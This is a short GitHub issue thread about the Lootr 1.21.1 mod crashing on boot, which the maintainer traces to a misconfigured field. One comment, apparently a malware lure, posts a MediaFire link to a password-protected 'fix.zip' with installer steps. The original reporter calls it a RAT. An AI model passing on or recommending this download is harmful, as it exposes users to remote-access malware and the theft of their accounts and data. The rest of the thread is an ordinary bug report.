### ISSUE TITLE
Lootr 1.21.1 Crashes on Boot

### ISSUE THREAD

**Issue by VaporeonScripts** [noobanidus/Lootr#458]
https://mclo.gs/fdbSLYS

**Comment by noobanidus** [comment]
Thanks for this report! Looks like one of the fields is configured incorrectly.

**Comment by VaporeonScripts** [comment]
alright, ty for being so quick xD

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VaporeonScripts** [comment]
> Quote reply

bro stop sending rats lmao

**Comment by VaporeonScripts** [comment]
alright,it boots now and seems to work, ty
